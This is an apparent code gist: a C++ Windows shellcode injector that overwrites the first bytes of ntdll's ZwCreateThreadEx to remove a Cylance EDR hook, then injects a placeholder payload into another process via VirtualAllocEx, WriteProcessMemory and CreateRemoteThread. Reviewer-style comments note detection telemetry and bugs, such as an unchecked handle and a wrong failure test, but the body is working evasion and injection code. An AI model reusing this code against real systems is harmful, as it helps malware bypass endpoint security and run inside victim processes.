@qgrosperrin
Created January 14, 2020 15:49
#include <iostream>
#include <windows.h>
// Placeholder payload. It is initialised from a string literal, so sizeof(buf)
// includes the terminating NUL; main() below sizes its allocation and its
// write from sizeof(buf).
unsigned char buf[] =
"SHELLCODE_GOES_HERE";
// Declared but never referenced anywhere in this listing.
struct syscall_table {
int osVersion;
};
// Remove Cylance hook from DLL export
/**
 * Overwrites the first five bytes of an exported function in the current
 * process with a fixed four-byte sequence followed by `code`.
 *
 * @param dll      Module name passed to LoadLibraryA.
 * @param apiName  Export name resolved with GetProcAddress.
 * @param code     Fifth byte written at the export address.
 *
 * Review notes (defender's view): this is an in-memory patch of a loaded
 * system DLL's code, which is exactly what image-integrity checks and
 * RWX-protection-change telemetry on ntdll are designed to surface. Neither
 * the LoadLibraryA nor the GetProcAddress result is checked for NULL before
 * it is used, and the VirtualProtect return values are ignored.
 */
void removeCylanceHook(const char *dll, const char *apiName, char code) {
DWORD old, newOld;
// Resolve the export in this process; a NULL from either call is not handled.
void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName);
printf("[*] Updating memory protection of %s!%s\n", dll, apiName);
// Make 10 bytes at the export writable+executable; `old` receives the
// previous protection so it can be restored below.
VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old);
printf("[*] Unhooking Cylance\n");
// Write the fixed four-byte prefix, then the caller-supplied fifth byte.
memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4);
*((char *)procAddress + 4) = code;
// Restore the original page protection.
VirtualProtect(procAddress, 10, old, &newOld);
}
/**
 * Entry point: takes a target PID on the command line, copies `buf` into the
 * target process and starts a remote thread at that address, patching
 * ntdll!ZwCreateThreadEx in this process first.
 *
 * Defender's view: the call chain OpenProcess(PROCESS_ALL_ACCESS) ->
 * VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread is the
 * textbook remote-thread injection sequence that EDR/ETW telemetry and
 * kernel callbacks are built to flag, and the in-process ntdll patch adds an
 * image-integrity signal on top of it.
 *
 * Returns 2 on bad usage, 1 on a failed open/allocate/write, and otherwise
 * falls off the end of main (implicitly 0 in C++). The process handle is
 * never closed, and the CreateRemoteThread result is neither checked nor
 * closed.
 */
int main(int argc, char **argv)
{
if (argc != 2) {
printf("Usage: %s PID\n", argv[0]);
return 2;
}
// atoi reports no errors: a non-numeric argument silently becomes PID 0.
DWORD processID = atoi(argv[1]);
HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID);
// NOTE(review): OpenProcess is documented to return NULL on failure, so this
// comparison against INVALID_HANDLE_VALUE may not catch a failed open.
if (proc == INVALID_HANDLE_VALUE) {
printf("[!] Error: Could not open target process: %d\n", processID);
return 1;
}
printf("[*] Opened target process %d\n", processID);
printf("[*] Allocating memory in target process with VirtualAllocEx\n");
// sizeof(buf) bytes, committed directly as read/write/execute in the target.
void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (alloc == (void*)0) {
printf("[!] Error: Could not allocate memory in target process\n");
return 1;
}
// NOTE(review): sizeof(buf) is a size_t printed with %d.
printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc);
printf("[*] Attempting to write into victim process using WriteProcessMemory\n");
if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) {
printf("[!] Error: Could not write to target process memory\n");
return 1;
}
printf("[*] WriteProcessMemory successful\n");
// Remove the NTDLL.DLL hook added by userland DLL
// Patches the export in *this* process; see removeCylanceHook above.
removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB);
printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n");
// The returned handle is neither checked for NULL nor closed; the success
// message below is printed unconditionally.
HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
printf("[*] Success :D\n");
}